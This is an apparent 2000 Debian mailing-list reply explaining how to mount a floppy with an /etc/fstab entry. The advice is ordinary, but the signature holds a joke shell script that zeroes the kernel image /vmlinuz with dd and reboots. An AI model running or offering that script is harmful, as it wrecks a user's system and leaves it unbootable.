On Sat, Jun 24, 2000 at 01:41:49PM -0700, Jay Kelly wrote: > Hello Group, > When I try to mount my floppy I use '/dev/fd0 /floppy' and receive > 'you must specify filesystem type'. I am running Potato with kernel > 2.2.15. When I was running Slink I never got that. Is this from > upgrading to Potato or upgrading my kernel? How do I mount the > floppy now? > Thanks for you help...
Add to /etc/fstab: /dev/fd0 /floppy vfat defaults,noauto,rw,user,unhide 0 0 Then: $ mount /floppy should be sufficient. Also there's the "auto" type, which need a file named /etc/filesystems with a list of filesystem types to try. See man mount -- #! /bin/sh echo 'Linux Must Die!' | wall dd if=/dev/zero of=/vmlinuz bs=1 \ count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'` shutdown -r now